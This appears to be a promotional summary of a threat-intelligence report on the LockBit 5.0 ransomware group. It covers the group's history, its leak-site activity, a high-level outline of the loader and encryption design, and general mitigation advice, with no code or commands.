✅ Report Title: Threat Group Profiling: LockBit 5.0

✅ Executive Summary:

📌 Who Is the LockBit Group?

- The LockBit ransomware group began independent operations under the name ABCD ransomware starting in September 2019, and updated to LockBit 5.0 in September 2025.

📌 DDW History

- After updating to LockBit 5.0, LockBit showed no activity on DLS (Data Leak Site) after May 2025. However, upon releasing LockBit 5.0 in September 2025, it significantly lowered the entry barrier by changing the affiliate sign-up fee to $500.

- After a reorganization period, it resumed activity in December 2025 and showed signs of restarting operations on XSS and RAMP forums.

📌 Detailed Analysis of LockBit 5.0 Ransomware

- LockBit 5.0 ransomware, also known as the ChoungDong version, is divided into a Loader and Ransomware component.

  - Loader: Decrypts the ransomware payload using XOR and LZ compression and executes it in memory.

  - Ransomware: Encryption method varies based on file size (up to 80MB), using the ChaCha20 + Curve25519 algorithm.

📌 Differences From LockBit 4.0

- The update from LockBit 4.0 to 5.0 significantly enhances analysis evasion and attack efficiency. It adds numerous new features like Mutex, Execution Delay, Status bar, Delete TEMP, and Wiper, while also overhauling the volume shadow copy deletion method and large file encryption logic.

✅ Recommended Threat Detection and Mitigation Actions:

- To block malicious file execution and prevent internal penetration, continuously monitor process behavior and abnormal signs. Always apply antivirus software and the latest security patches to minimize intrusion through known vulnerabilities.

- Establish cyber attack response and security enhancement measures using the IoC, Detection Rules, and MITRE ATT&CK. Prepare to respond swiftly in the event of a security breach.

👉 Read the full report: https://bit.ly/49uamlP

🧑‍💻 Author: S2W TALON

*The full report is available upon request or with a subscription to the S2W platform.